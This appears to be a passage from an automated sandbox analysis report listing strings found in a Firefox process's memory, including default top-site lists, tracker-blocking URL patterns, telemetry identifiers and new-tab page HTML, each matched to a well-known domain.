functionMHYwEAYHKoZIzj0CAQYFK4EEACIDYgAEYyj8zLJVJc//j1xARfPx+oE/xqqM7O7tEZ9+XMWBeEQCqbJZRV8YS8VVq7GffqygmqryEGBhGRP5MX05XlfMO0cKletwojy/g/uWNoFAMYM3K/5640rSS53JHtjagJJEhttps://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.amazon.fr/,https://www.leboncoin.fr/,https://twitter.com/https://www.youtube.com/,https://www.facebook.com/,https://www.amazon.com/,https://www.reddit.com/,https://www.wikipedia.org/,https://twitter.com/You may not unsubscribe from a store listener while the reducer is executing. See https://redux.js.org/api-reference/store#subscribe(listener) for more details.https://www.youtube.com/,https://www.facebook.com/,https://www.amazon.de/,https://www.ebay.de/,https://www.wikipedia.org/,https://www.reddit.com/https://www.youtube.com/,https://www.facebook.com/,https://www.reddit.com/,https://www.wikipedia.org/,https://www.amazon.ca/,https://twitter.com/https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.reddit.com/,https://www.amazon.com/,https://twitter.com/ equals www.youtube.com (Youtube)
Source: firefox.exe, 0000001E.00000002.3036698382.00000270D6D73000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: You may not unsubscribe from a store listener while the reducer is executing. See https://redux.js.org/api-reference/store#subscribe(listener) for more details.https://www.youtube.com/,https://www.facebook.com/,https://www.amazon.de/,https://www.ebay.de/,https://www.wikipedia.org/,https://www.reddit.com/ equals www.facebook.com (Facebook)
Source: firefox.exe, 0000001E.00000002.3036698382.00000270D6D73000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: You may not unsubscribe from a store listener while the reducer is executing. See https://redux.js.org/api-reference/store#subscribe(listener) for more details.https://www.youtube.com/,https://www.facebook.com/,https://www.amazon.de/,https://www.ebay.de/,https://www.wikipedia.org/,https://www.reddit.com/ equals www.youtube.com (Youtube)
Source: firefox.exe, 0000001E.00000002.3066978967.00000270DAF08000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: [{incognito:null, tabId:null, types:["image"], urls:["*://track.adform.net/Serving/TrackPoint/*", "*://pixel.advertising.com/firefox-etp", "*://*.advertising.com/*.js*", "*://*.advertising.com/*", "*://securepubads.g.doubleclick.net/gampad/*ad-blk*", "*://pubads.g.doubleclick.net/gampad/*ad-blk*", "*://securepubads.g.doubleclick.net/gampad/*xml_vmap1*", "*://pubads.g.doubleclick.net/gampad/*xml_vmap1*", "*://vast.adsafeprotected.com/vast*", "*://securepubads.g.doubleclick.net/gampad/*xml_vmap2*", "*://pubads.g.doubleclick.net/gampad/*xml_vmap2*", "*://securepubads.g.doubleclick.net/gampad/*ad*", "*://pubads.g.doubleclick.net/gampad/*ad*", "*://www.facebook.com/platform/impression.php*", "https://ads.stickyadstv.com/firefox-etp", "*://ads.stickyadstv.com/auto-user-sync*", "*://ads.stickyadstv.com/user-matching*", "https://static.adsafeprotected.com/firefox-etp-pixel", "*://*.adsafeprotected.com/*.gif*", "*://*.adsafeprotected.com/*.png*", "*://*.adsafeprotected.com/*.js*", "*://*.adsafeprotected.com/*/adj*", "*://*.adsafeprotected.com/*/imp/*", "*://*.adsafeprotected.com/*/Serving/*", "*://*.adsafeprotected.com/*/unit/*", "*://*.adsafeprotected.com/jload", "*://*.adsafeprotected.com/jload?*", "*://*.adsafeprotected.com/jsvid", "*://*.adsafeprotected.com/jsvid?*", "*://*.adsafeprotected.com/mon*", "*://*.adsafeprotected.com/tpl", "*://*.adsafeprotected.com/tpl?*", "*://*.adsafeprotected.com/services/pub*", "*://*.adsafeprotected.com/*"], windowId:null}, ["blocking"]] equals www.facebook.com (Facebook)
Source: firefox.exe, 0000001E.00000002.3066978967.00000270DAF08000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: [{incognito:null, tabId:null, types:["imageset"], urls:["*://track.adform.net/Serving/TrackPoint/*", "*://pixel.advertising.com/firefox-etp", "*://*.advertising.com/*.js*", "*://*.advertising.com/*", "*://securepubads.g.doubleclick.net/gampad/*ad-blk*", "*://pubads.g.doubleclick.net/gampad/*ad-blk*", "*://securepubads.g.doubleclick.net/gampad/*xml_vmap1*", "*://pubads.g.doubleclick.net/gampad/*xml_vmap1*", "*://vast.adsafeprotected.com/vast*", "*://securepubads.g.doubleclick.net/gampad/*xml_vmap2*", "*://pubads.g.doubleclick.net/gampad/*xml_vmap2*", "*://securepubads.g.doubleclick.net/gampad/*ad*", "*://pubads.g.doubleclick.net/gampad/*ad*", "*://www.facebook.com/platform/impression.php*", "https://ads.stickyadstv.com/firefox-etp", "*://ads.stickyadstv.com/auto-user-sync*", "*://ads.stickyadstv.com/user-matching*", "https://static.adsafeprotected.com/firefox-etp-pixel", "*://*.adsafeprotected.com/*.gif*", "*://*.adsafeprotected.com/*.png*", "*://*.adsafeprotected.com/*.js*", "*://*.adsafeprotected.com/*/adj*", "*://*.adsafeprotected.com/*/imp/*", "*://*.adsafeprotected.com/*/Serving/*", "*://*.adsafeprotected.com/*/unit/*", "*://*.adsafeprotected.com/jload", "*://*.adsafeprotected.com/jload?*", "*://*.adsafeprotected.com/jsvid", "*://*.adsafeprotected.com/jsvid?*", "*://*.adsafeprotected.com/mon*", "*://*.adsafeprotected.com/tpl", "*://*.adsafeprotected.com/tpl?*", "*://*.adsafeprotected.com/services/pub*", "*://*.adsafeprotected.com/*"], windowId:null}, ["blocking"]] equals www.facebook.com (Facebook)
Source: firefox.exe, 0000001E.00000002.3036698382.00000270D6D57000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: [{incognito:null, tabId:null, types:["script"], urls:["*://webcompat-addon-testbed.herokuapp.com/shims_test.js", "*://example.com/browser/browser/extensions/webcompat/tests/browser/shims_test.js", "*://example.com/browser/browser/extensions/webcompat/tests/browser/shims_test_2.js", "*://example.com/browser/browser/extensions/webcompat/tests/browser/shims_test_3.js", "*://s7.addthis.com/icons/official-addthis-angularjs/current/dist/official-addthis-angularjs.min.js*", "*://track.adform.net/serving/scripts/trackpoint/", "*://track.adform.net/serving/scripts/trackpoint/async/", "*://*.adnxs.com/*/ast.js*", "*://*.adnxs.com/*/pb.js*", "*://*.adnxs.com/*/prebid*", "*://www.everestjs.net/static/st.v3.js*", "*://static.adsafeprotected.com/vans-adapter-google-ima.js", "*://pagead2.googlesyndication.com/pagead/js/adsbygoogle.js", "*://cdn.branch.io/branch-latest.min.js*", "*://pub.doubleverify.com/signals/pub.js*", "*://c.amazon-adsystem.com/aax2/apstag.js", "*://auth.9c9media.ca/auth/main.js", "*://static.chartbeat.com/js/chartbeat.js", "*://static.chartbeat.com/js/chartbeat_video.js", "*://static.criteo.net/js/ld/publishertag.js", "*://*.imgur.com/js/vendor.*.bundle.js", "*://*.imgur.io/js/vendor.*.bundle.js", "*://www.rva311.com/static/js/main.*.chunk.js", "*://web-assets.toggl.com/app/assets/scripts/*.js", "*://libs.coremetrics.com/eluminate.js", "*://connect.facebook.net/*/sdk.js*", "*://connect.facebook.net/*/all.js*", "*://secure.cdn.fastclick.net/js/cnvr-launcher/*/launcher-stub.min.js*", "*://www.google-analytics.com/analytics.js*", "*://www.google-analytics.com/gtm/js*", "*://www.googletagmanager.com/gtm.js*", "*://www.google-analytics.com/plugins/ua/ec.js", "*://ssl.google-analytics.com/ga.js", "*://s0.2mdn.net/instream/html5/ima3.js", "*://imasdk.googleapis.com/js/sdkloader/ima3.js", "*://www.googleadservices.com/pagead/conversion_async.js", "*://www.googletagservices.com/tag/js/gpt.js*", "*://pagead2.googlesyndication.com/tag/js/gpt.js*", "*://pagead2.googlesyndication.com/gpt/pubads_impl_*.js*", "*://securepubads.g.doubleclick.net/tag/js/gpt.js*", "*://securepubads.g.doubleclick.net/gpt/pubads_impl_*.js*", "*://script.ioam.de/iam.js", "*://cdn.adsafeprotected.com/iasPET.1.js", "*://static.adsafeprotected.com/iasPET.1.js", "*://adservex.media.net/videoAds.js*", "*://*.moatads.com/*/moatad.js*", "*://*.moatads.com/*/moatapi.js*", "*://*.moatads.com/*/moatheader.js*", "*://*.moatads.com/*/yi.js*", "*://*.imrworldwide.com/v60.js", "*://cdn.optimizely.com/js/*.js", "*://cdn.optimizely.com/public/*.js", "*://id.rambler.ru/rambler-id-helper/auth_events.js", "*://media.richrelevance.com/rrserver/js/1.2/p13n.js", "*://www.gstatic.com/firebasejs/*/firebase-messaging.js*", "*://*.vidible.tv/*/vidible-min.js*", "*://vdb-cdn-files.s3.amazonaws.com/*/vidible-min.js*", "*://js.maxmind.com/js/apis/geoip2/*/geoip2.js", "*://s.webtrends.com/js/advancedLinkTracking.js", "*://s.webtrends.com/js/webtrends.js", "*://s.webtrends.com/js/webtrends.min.js"], windowId
Source: firefox.exe, 0000001E.00000002.3036698382.00000270D6D57000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: [{incognito:null, tabId:null, types:["script"], urls:["*://webcompat-addon-testbed.herokuapp.com/shims_test.js", "*://example.com/browser/browser/extensions/webcompat/tests/browser/shims_test.js", "*://example.com/browser/browser/extensions/webcompat/tests/browser/shims_test_2.js", "*://example.com/browser/browser/extensions/webcompat/tests/browser/shims_test_3.js", "*://s7.addthis.com/icons/official-addthis-angularjs/current/dist/official-addthis-angularjs.min.js*", "*://track.adform.net/serving/scripts/trackpoint/", "*://track.adform.net/serving/scripts/trackpoint/async/", "*://*.adnxs.com/*/ast.js*", "*://*.adnxs.com/*/pb.js*", "*://*.adnxs.com/*/prebid*", "*://www.everestjs.net/static/st.v3.js*", "*://static.adsafeprotected.com/vans-adapter-google-ima.js", "*://pagead2.googlesyndication.com/pagead/js/adsbygoogle.js", "*://cdn.branch.io/branch-latest.min.js*", "*://pub.doubleverify.com/signals/pub.js*", "*://c.amazon-adsystem.com/aax2/apstag.js", "*://auth.9c9media.ca/auth/main.js", "*://static.chartbeat.com/js/chartbeat.js", "*://static.chartbeat.com/js/chartbeat_video.js", "*://static.criteo.net/js/ld/publishertag.js", "*://*.imgur.com/js/vendor.*.bundle.js", "*://*.imgur.io/js/vendor.*.bundle.js", "*://www.rva311.com/static/js/main.*.chunk.js", "*://web-assets.toggl.com/app/assets/scripts/*.js", "*://libs.coremetrics.com/eluminate.js", "*://connect.facebook.net/*/sdk.js*", "*://connect.facebook.net/*/all.js*", "*://secure.cdn.fastclick.net/js/cnvr-launcher/*/launcher-stub.min.js*", "*://www.google-analytics.com/analytics.js*", "*://www.google-analytics.com/gtm/js*", "*://www.googletagmanager.com/gtm.js*", "*://www.google-analytics.com/plugins/ua/ec.js", "*://ssl.google-analytics.com/ga.js", "*://s0.2mdn.net/instream/html5/ima3.js", "*://imasdk.googleapis.com/js/sdkloader/ima3.js", "*://www.googleadservices.com/pagead/conversion_async.js", "*://www.googletagservices.com/tag/js/gpt.js*", "*://pagead2.googlesyndication.com/tag/js/gpt.js*", "*://pagead2.googlesyndication.com/gpt/pubads_impl_*.js*", "*://securepubads.g.doubleclick.net/tag/js/gpt.js*", "*://securepubads.g.doubleclick.net/gpt/pubads_impl_*.js*", "*://script.ioam.de/iam.js", "*://cdn.adsafeprotected.com/iasPET.1.js", "*://static.adsafeprotected.com/iasPET.1.js", "*://adservex.media.net/videoAds.js*", "*://*.moatads.com/*/moatad.js*", "*://*.moatads.com/*/moatapi.js*", "*://*.moatads.com/*/moatheader.js*", "*://*.moatads.com/*/yi.js*", "*://*.imrworldwide.com/v60.js", "*://cdn.optimizely.com/js/*.js", "*://cdn.optimizely.com/public/*.js", "*://id.rambler.ru/rambler-id-helper/auth_events.js", "*://media.richrelevance.com/rrserver/js/1.2/p13n.js", "*://www.gstatic.com/firebasejs/*/firebase-messaging.js*", "*://*.vidible.tv/*/vidible-min.js*", "*://vdb-cdn-files.s3.amazonaws.com/*/vidible-min.js*", "*://js.maxmind.com/js/apis/geoip2/*/geoip2.js", "*://s.webtrends.com/js/advancedLinkTracking.js", "*://s.webtrends.com/js/webtrends.js", "*://s.webtrends.com/js/webtrends.min.js"], windowId
Source: firefox.exe, 0000001E.00000002.3066978967.00000270DAF10000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: [{incognito:null, tabId:null, types:["xmlhttprequest"], urls:["*://track.adform.net/Serving/TrackPoint/*", "*://pagead2.googlesyndication.com/pagead/*.js*fcd=true", "*://pagead2.googlesyndication.com/pagead/js/*.js*fcd=true", "*://pixel.advertising.com/firefox-etp", "*://cdn.cmp.advertising.com/firefox-etp", "*://*.advertising.com/*.js*", "*://*.advertising.com/*", "*://securepubads.g.doubleclick.net/gampad/*ad-blk*", "*://pubads.g.doubleclick.net/gampad/*ad-blk*", "*://securepubads.g.doubleclick.net/gampad/*xml_vmap1*", "*://pubads.g.doubleclick.net/gampad/*xml_vmap1*", "*://vast.adsafeprotected.com/vast*", "*://securepubads.g.doubleclick.net/gampad/*xml_vmap2*", "*://pubads.g.doubleclick.net/gampad/*xml_vmap2*", "*://securepubads.g.doubleclick.net/gampad/*ad*", "*://pubads.g.doubleclick.net/gampad/*ad*", "*://www.facebook.com/platform/impression.php*", "https://ads.stickyadstv.com/firefox-etp", "*://ads.stickyadstv.com/auto-user-sync*", "*://ads.stickyadstv.com/user-matching*", "https://static.adsafeprotected.com/firefox-etp-pixel", "https://static.adsafeprotected.com/firefox-etp-js", "*://*.adsafeprotected.com/*.gif*", "*://*.adsafeprotected.com/*.png*", "*://*.adsafeprotected.com/*.js*", "*://*.adsafeprotected.com/*/adj*", "*://*.adsafeprotected.com/*/imp/*", "*://*.adsafeprotected.com/*/Serving/*", "*://*.adsafeprotected.com/*/unit/*", "*://*.adsafeprotected.com/jload", "*://*.adsafeprotected.com/jload?*", "*://*.adsafeprotected.com/jsvid", "*://*.adsafeprotected.com/jsvid?*", "*://*.adsafeprotected.com/mon*", "*://*.adsafeprotected.com/tpl", "*://*.adsafeprotected.com/tpl?*", "*://*.adsafeprotected.com/services/pub*", "*://*.adsafeprotected.com/*"], windowId:null}, ["blocking"]] equals www.facebook.com (Facebook)
Source: firefox.exe, 0000001E.00000002.3097214328.00000270E219F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000003.2993891650.00000270E219F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: `https://www.facebook.com/ equals www.facebook.com (Facebook)
Source: firefox.exe, 0000001E.00000002.3097214328.00000270E219F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000003.2993891650.00000270E219F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: `https://www.youtube.com/ equals www.youtube.com (Youtube)
Source: firefox.exe, 0000001E.00000002.3036698382.00000270D6D03000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: color-mix(in srgb, currentColor 14%, transparent)*://id.rambler.ru/rambler-id-helper/auth_events.js*://securepubads.g.doubleclick.net/gampad/*ad-blk*https://static.adsafeprotected.com/firefox-etp-js*://www.googleadservices.com/pagead/conversion_async.jsassemblePayloadWithMeasurements/measurementsContainGPU<assemblePayloadWithMeasurements/measurementsContainSocket<assemblePayloadWithMeasurements/payloadObj.slowSQL<assemblePayloadWithMeasurements/payloadObj.fileIOReports<browser.engagement.session_time_including_suspendresource://gre/modules/TelemetryEnvironment.sys.mjsassemblePayloadWithMeasurements/payloadObj.lateWrites<assemblePayloadWithMeasurements/payloadObj.addonDetails<saveShutdownPings - failed to submit first shutdown pingtoolkit.telemetry.shutdownPingSender.enabledFirstSessionresource://gre/modules/TelemetryTimestamps.sys.mjssaveShutdownPings - failed to submit shutdown ping_sendDailyPing - Failed to save the aborted session pingassemblePayloadWithMeasurements/measurements.keyedScalars<color-mix(in srgb, currentColor 25%, transparent)getScalars - We only support scalars in subsessions.browser.engagement.session_time_excluding_suspendassemblePayloadWithMeasurements/measurementsContainUtility<linear-gradient(90deg, #9059FF 0%, #FF4AA2 52.08%, #FFBD4F 100%)resource://gre/modules/TelemetryController.sys.mjshttps://www.amazon.com/exec/obidos/external-search/*resource://gre/modules/TelemetryControllerBase.sys.mjsdatareporting.policy.dataSubmissionPolicyNotifiedTimeresource://gre/modules/TelemetryScheduler.sys.mjsassemblePayloadWithMeasurements - caught exceptionassemblePayloadWithMeasurements/measurements.histograms<assemblePayloadWithMeasurements/measurements.keyedHistograms<resource://gre/modules/TelemetryReportingPolicy.sys.mjssaveShutdownPings - failed to submit saved-session ping_onEnvironmentChange - throttling; last change was assemblePayloadWithMeasurements/measurements.scalars< equals www.rambler.ru (Rambler)
Source: firefox.exe, 0000001E.00000002.3049538912.00000270DA12A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: doff-text" data-l10n-args="{&quot;engine&quot;: &quot;Google&quot;}"></div><input type="search" class="fake-editable" tabindex="-1" aria-hidden="true"/><div class="fake-caret"></div></button></div></div></div><div class="body-wrapper on"><div class="discovery-stream ds-layout"><div class="ds-column ds-column-12"><div class="ds-column-grid"><div><div class="ds-top-sites"><section class="collapsible-section top-sites" data-section-id="topsites"><div class="section-top-bar"><h3 class="section-title-container " style="visibility:hidden"><span class="section-title"><span data-l10n-id="newtab-section-header-topsites"></span></span><span class="learn-more-link-wrapper"></span></h3></div><div><ul class="top-sites-list"><li class="top-site-outer placeholder "><div class="top-site-inner"><a class="top-site-button" tabindex="0" draggable="true" data-is-sponsored-link="false"><div class="tile" aria-hidden="true"><div class="icon-wrapper"><div class=""></div></div></div><div class="title"><span dir="auto"><br/><span class="sponsored-label" data-l10n-id="newtab-topsite-sponsored"></span></span></div></a><button aria-haspopup="dialog" class="context-menu-button edit-button icon" data-l10n-id="newtab-menu-topsites-placeholder-tooltip"></button><div class="topsite-impression-observer"></div></div></li><li class="top-site-outer placeholder "><div class="top-site-inner"><a class="top-site-button" tabindex="0" draggable="true" data-is-sponsored-link="false"><div class="tile" aria-hidden="true"><div class="icon-wrapper"><div class=""></div></div></div><div class="title"><span dir="auto"><br/><span class="sponsored-label" data-l10n-id="newtab-topsite-sponsored"></span></span></div></a><button aria-haspopup="dialog" class="context-menu-button edit-button icon" data-l10n-id="newtab-menu-topsites-placeholder-tooltip"></button><div class="topsite-impression-observer"></div></div></li><li class="top-site-outer"><div class="top-site-inner"><a class="top-site-button" href="https://www.youtube.com/" tabindex="0" draggable="true" data-is-sponsored-link="false"><div class="tile" aria-hidden="true"><div class="icon-wrapper" data-fallback="Y"><div class="top-site-icon rich-icon" style="background-image:url(chrome://activity-stream/content/data/content/tippytop/images/youtube-com@2x.png)"></div></div></div><div class="title"><span dir="auto">YouTube<span class="sponsored-label" data-l10n-id="newtab-topsite-sponsored"></span></span></div></a><div><button aria-haspopup="true" data-l10n-id="newtab-menu-content-tooltip" data-l10n-args="{&quot;title&quot;:&quot;YouTube&quot;}" class="context-menu-button icon"></button></div><div class="topsite-impression-observer"></div></div></li><li class="top-site-outer"><div class="top-site-inner"><a class="top-site-button" href="https://www.facebook.com/" tabindex="0" draggable="true" data-is-sponsored-link="false"><div class="tile" aria-hidden="true"><div class="icon-wrapper" data-fallback="F"><div class="top-site-icon rich-icon" style="backgroun
Source: firefox.exe, 0000001E.00000002.3049538912.00000270DA12A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: doff-text" data-l10n-args="{&quot;engine&quot;: &quot;Google&quot;}"></div><input type="search" class="fake-editable" tabindex="-1" aria-hidden="true"/><div class="fake-caret"></div></button></div></div></div><div class="body-wrapper on"><div class="discovery-stream ds-layout"><div class="ds-column ds-column-12"><div class="ds-column-grid"><div><div class="ds-top-sites"><section class="collapsible-section top-sites" data-section-id="topsites"><div class="section-top-bar"><h3 class="section-title-container " style="visibility:hidden"><span class="section-title"><span data-l10n-id="newtab-section-header-topsites"></span></span><span class="learn-more-link-wrapper"></span></h3></div><div><ul class="top-sites-list"><li class="top-site-outer placeholder "><div class="top-site-inner"><a class="top-site-button" tabindex="0" draggable="true" data-is-sponsored-link="false"><div class="tile" aria-hidden="true"><div class="icon-wrapper"><div class=""></div></div></div><div class="title"><span dir="auto"><br/><span class="sponsored-label" data-l10n-id="newtab-topsite-sponsored"></span></span></div></a><button aria-haspopup="dialog" class="context-menu-button edit-button icon" data-l10n-id="newtab-menu-topsites-placeholder-tooltip"></button><div class="topsite-impression-observer"></div></div></li><li class="top-site-outer placeholder "><div class="top-site-inner"><a class="top-site-button" tabindex="0" draggable="true" data-is-sponsored-link="false"><div class="tile" aria-hidden="true"><div class="icon-wrapper"><div class=""></div></div></div><div class="title"><span dir="auto"><br/><span class="sponsored-label" data-l10n-id="newtab-topsite-sponsored"></span></span></div></a><button aria-haspopup="dialog" class="context-menu-button edit-button icon" data-l10n-id="newtab-menu-topsites-placeholder-tooltip"></button><div class="topsite-impression-observer"></div></div></li><li class="top-site-outer"><div class="top-site-inner"><a class="top-site-button" href="https://www.youtube.com/" tabindex="0" draggable="true" data-is-sponsored-link="false"><div class="tile" aria-hidden="true"><div class="icon-wrapper" data-fallback="Y"><div class="top-site-icon rich-icon" style="background-image:url(chrome://activity-stream/content/data/content/tippytop/images/youtube-com@2x.png)"></div></div></div><div class="title"><span dir="auto">YouTube<span class="sponsored-label" data-l10n-id="newtab-topsite-sponsored"></span></span></div></a><div><button aria-haspopup="true" data-l10n-id="newtab-menu-content-tooltip" data-l10n-args="{&quot;title&quot;:&quot;YouTube&quot;}" class="context-menu-button icon"></button></div><div class="topsite-impression-observer"></div></div></li><li class="top-site-outer"><div class="top-site-inner"><a class="top-site-button" href="https://www.facebook.com/" tabindex="0" draggable="true" data-is-sponsored-link="false"><div class="tile" aria-hidden="true"><div class="icon-wrapper" data-fallback="F"><div class="top-site-icon rich-icon" style="backgroun
Source: firefox.exe, 0000001E.00000002.3036698382.00000270D6D27000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.youtube.com equals www.youtube.com (Youtube)
Source: firefox.exe, 0000001E.00000002.3069796496.00000270DB2B0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.youtube.com/ equals www.youtube.com (Youtube)
Source: firefox.exe, 0000001E.00000002.3078302717.00000270DC7A4000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.3036698382.00000270D6DE7000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://vk.com/,https://www.youtube.com/,https://ok.ru/,https://www.avito.ru/,https://www.aliexpress.com/,https://www.wikipedia.org/ equals www.youtube.com (Youtube)
Source: firefox.exe, 0000001E.00000002.3073075739.00000270DB85A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000003.3008157636.00000270E41DF000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000003.3000078726.00000270DAF67000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.facebook.com/ equals www.facebook.com (Facebook)
Source: firefox.exe, 0000001E.00000002.3100479236.00000270E230D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.3115240088.000039E679900000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.3035541532.00000270D6C0D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com equals www.youtube.com (Youtube)
Source: firefox.exe, 0000001E.00000002.3114150940.00001A176F100000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.3073075739.00000270DB85A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.3080838293.00000270DC87E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/ equals www.youtube.com (Youtube)
Source: firefox.exe, 0000001E.00000002.3078302717.00000270DC7A4000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.3036698382.00000270D6DE7000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://allegro.pl/,https://www.wikipedia.org/,https://www.olx.pl/,https://www.wykop.pl/ equals www.facebook.com (Facebook)
Source: firefox.exe, 0000001E.00000002.3078302717.00000270DC7A4000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.3036698382.00000270D6DE7000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://allegro.pl/,https://www.wikipedia.org/,https://www.olx.pl/,https://www.wykop.pl/ equals www.youtube.com (Youtube)
Source: firefox.exe, 0000001E.00000002.3078302717.00000270DC7A4000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.3036698382.00000270D6D73000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.amazon.com/,https://www.reddit.com/,https://www.wikipedia.org/,https://twitter.com/ equals www.facebook.com (Facebook)
Source: firefox.exe, 0000001E.00000002.3078302717.00000270DC7A4000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.3036698382.00000270D6D73000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.amazon.com/,https://www.reddit.com/,https://www.wikipedia.org/,https://twitter.com/ equals www.twitter.com (Twitter)
Source: firefox.exe, 0000001E.00000002.3078302717.00000270DC7A4000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.3036698382.00000270D6D73000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.amazon.com/,https://www.reddit.com/,https://www.wikipedia.org/,https://twitter.com/ equals www.youtube.com (Youtube)
Source: firefox.exe, 0000001E.00000002.3078302717.00000270DC7A4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.amazon.de/,https://www.ebay.de/,https://www.wikipedia.org/,https://www.reddit.com/ equals www.facebook.com (Facebook)
Source: firefox.exe, 0000001E.00000002.3078302717.00000270DC7A4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.amazon.de/,https://www.ebay.de/,https://www.wikipedia.org/,https://www.reddit.com/ equals www.youtube.com (Youtube)
Source: firefox.exe, 0000001E.00000002.3078302717.00000270DC7A4000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.3036698382.00000270D6D73000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.reddit.com/,https://www.amazon.co.uk/,https://www.bbc.co.uk/,https://www.ebay.co.uk/ equals www.facebook.com (Facebook)
Source: firefox.exe, 0000001E.00000002.3078302717.00000270DC7A4000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.3036698382.00000270D6D73000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.reddit.com/,https://www.amazon.co.uk/,https://www.bbc.co.uk/,https://www.ebay.co.uk/ equals www.youtube.com (Youtube)
Source: firefox.exe, 0000001E.00000002.3078302717.00000270DC7A4000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.3036698382.00000270D6D73000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.reddit.com/,https://www.wikipedia.org/,https://www.amazon.ca/,https://twitter.com/ equals www.facebook.com (Facebook)
Source: firefox.exe, 0000001E.00000002.3078302717.00000270DC7A4000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.3036698382.00000270D6D73000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.reddit.com/,https://www.wikipedia.org/,https://www.amazon.ca/,https://twitter.com/ equals www.twitter.com (Twitter)
Source: firefox.exe, 0000001E.00000002.3078302717.00000270DC7A4000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.3036698382.00000270D6D73000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.reddit.com/,https://www.wikipedia.org/,https://www.amazon.ca/,https://twitter.com/ equals www.youtube.com (Youtube)
Source: firefox.exe, 0000001E.00000002.3078302717.00000270DC7A4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.amazon.fr/,https://www.leboncoin.fr/,https://twitter.com/ equals www.facebook.com (Facebook)
Source: firefox.exe, 0000001E.00000002.3078302717.00000270DC7A4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.amazon.fr/,https://www.leboncoin.fr/,https://twitter.com/ equals www.twitter.com (Twitter)
Source: firefox.exe, 0000001E.00000002.3078302717.00000270DC7A4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.amazon.fr/,https://www.leboncoin.fr/,https://twitter.com/ equals www.youtube.com (Youtube)
Source: firefox.exe, 0000001E.00000002.3078302717.00000270DC7A4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.amazon.fr/,https://www.leboncoin.fr/,https://twitter.com/L equals www.facebook.com (Facebook)
Source: firefox.exe, 0000001E.00000002.3078302717.00000270DC7A4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.amazon.fr/,https://www.leboncoin.fr/,https://twitter.com/L equals www.twitter.com (Twitter)
